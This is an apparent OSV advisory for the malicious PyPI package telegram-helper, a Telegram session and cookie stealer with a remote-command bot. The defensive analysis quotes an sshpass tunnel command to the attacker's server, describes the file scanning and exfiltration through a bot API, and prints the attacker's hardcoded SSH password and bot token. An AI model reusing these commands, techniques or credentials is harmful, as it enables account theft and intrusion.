MAL-2026-16017

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/telegram-helper/MAL-2026-16017.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16017
Published
2026-09-07T21:17:35Z
Modified
2026-09-09T03:30:11Z
Summary
Malicious code in telegram-helper (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (90afeb1d39f1ef3d107f2da6a26c4af8c7efb314bb0f272d45fa755119e1b669)

telegram_helper describes itself as "A minimal example Python library" and ships a Russian-language template README (the Homepage field is still the unedited placeholder https://github.com/your-username/telegram_helper), but the entire 9,586-byte src/telegram_helper/init.py is a Telegram account-theft toolkit with credentials hardcoded in cleartext: SSH_HOST = "163.5.153.115", SSH_USER = "root", SSH_PASS = "AsQnq6CXk3eCm", BOT_TOKEN = "8948626737:AAEO9HcDgkKgbUXc3uXLt7geH_nK41vlzXg", YOUR_ID = "1625851734", and API_ID/API_HASH 20838706 / d5efb283650598ff4d3570adbbcb8d15.

daemonize() performs a POSIX double-fork plus setsid and redirects stdin/stdout/stderr to /dev/null, or on Windows calls ctypes.windll.user32.ShowWindow(GetConsoleWindow(), 0) to hide the console. start_socks_tunnel() shells out to sshpass -p ssh -N -D 127.0.0.1:10808 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@163.5.153.115, and set_proxy_env() then points http_proxy, https_proxy and all_proxy at that SOCKS5 listener, routing subsequent traffic through the author's host with host-key verification disabled.

scan_sessions(), scan_tdata() and scan_cookies() walk ~, /tmp and /root for Telethon/Pyrogram session files (*.session, .session., *.pyrogram, *.ini), Telegram Desktop tdata directories, and any filename containing cookie. check_session_telethon() and check_session_pyrogram() then connect each recovered session to Telegram using the author's own API_ID/API_HASH, call is_user_authorized(), and read back me.id, me.username, me.first_name and me.last_name to validate and label each hijacked account.

full_scan_and_send() exfiltrates every session file via POST https://api.telegram.org/bot<BOT_TOKEN>/sendDocument to chat_id=1625851734 with the enumerated account identity as the caption, ZIP-archives each tdata directory to /tmp/tdata_.zip and uploads it before deleting the archive, uploads every matched cookie file, and posts a summary count via /sendMessage. The module additionally registers Telegram command handlers /scan, /send_tdata, /send_sessions, /send_cookies, /ip and /kill, giving the bot owner an on-demand remote command channel against the victim host.

Notably pyproject.toml declares no dependencies at all while the module imports requests, telegram, telethon and pyrogram, so the package only loads successfully on machines that already have Telegram client libraries installed - i.e. Telegram bot and userbot developers, whose session files are exactly what it targets.

Source: kam193 (7db7944f424aaa877ab4c7d4555c4358900d45011b05a886837a14efea2a72a9)

The package hides code that starts a Telegram bot to exfiltrate sensitive session files and cookies


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-09-telegram-helper

Reasons (based on the campaign):

  • The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.

  • rat

  • files-exfiltration

  • target:telegram

  • uses-telegram-bot

  • exfiltration-browser-data

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "pypi/2026-09-telegram-helper/telegram-helper",
            "import_time":  "2026-09-07T21:38:11.218467811Z",
            "modified_time":  "2026-09-07T21:17:35.335618Z",
            "sha256":  "7db7944f424aaa877ab4c7d4555c4358900d45011b05a886837a14efea2a72a9",
            "source":  "kam193",
            "versions":  [
                "0.1.1",
                "0.1.2"
            ]
        },
        {
            "id":  "IN-MAL-2026-019756",
            "import_time":  "2026-09-09T02:24:48.313869684Z",
            "modified_time":  "2026-09-09T02:01:42Z",
            "sha256":  "90afeb1d39f1ef3d107f2da6a26c4af8c7efb314bb0f272d45fa755119e1b669",
            "source":  "amazon-inspector",
            "versions":  [
                "0.1.2"
            ]
        },
        {
            "id":  "IN-MAL-2026-019790",
            "import_time":  "2026-09-09T03:21:53.887771776Z",
            "modified_time":  "2026-09-09T02:46:16Z",
            "sha256":  "bc72c76176d921e22ec30286e0b468d65f8b6318ab27e848907872bfeffaa22c",
            "source":  "amazon-inspector",
            "versions":  [
                "0.1.1"
            ]
        }
    ]
}
References
Credits

Affected packages

PyPI / telegram-helper

Package

Name
telegram-helper
View open source insights on deps.dev
Purl
pkg:pypi/telegram-helper

Affected ranges

Affected versions

0.*
0.1.1
0.1.2

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    },
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "package_integrity":  [
        {
            "filename":  "telegram_helper-0.1.2-py3-none-any.whl",
            "hashes":  {
                "blake2b_256":  "b7237b1e88dcbf7e88a407860b8f83f28c8eb027828362ed1cc026d968c9be69",
                "md5":  "38c2a4f1606ba30c9d6d74b54632b40d",
                "sha256":  "cfb3663e02bc8bba714914413b3995b9fdaff294627a2d7e3126000b704bb2ae"
            }
        },
        {
            "filename":  "telegram_helper-0.1.2.tar.gz",
            "hashes":  {
                "blake2b_256":  "b9bfff5d323b7312b36cdeee339c90bceb133b1097f0f8fdc9f430411805ab15",
                "md5":  "903cc36d67ddd1558470d06048149940",
                "sha256":  "cb2d4d7ce04bf318a5eb725b92fe0eeb4f37dd5b700a51bf525d9c592d3dec33"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/telegram-helper/MAL-2026-16017.json"